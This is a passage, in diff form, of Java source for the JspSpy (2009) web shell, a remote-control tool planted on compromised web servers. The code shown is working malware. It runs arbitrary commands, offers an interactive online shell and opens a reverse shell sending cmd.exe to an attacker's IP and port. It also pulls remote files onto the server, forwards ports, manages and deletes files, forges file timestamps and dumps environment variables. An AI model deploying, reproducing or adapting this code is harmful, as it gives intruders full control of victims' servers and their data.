    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); 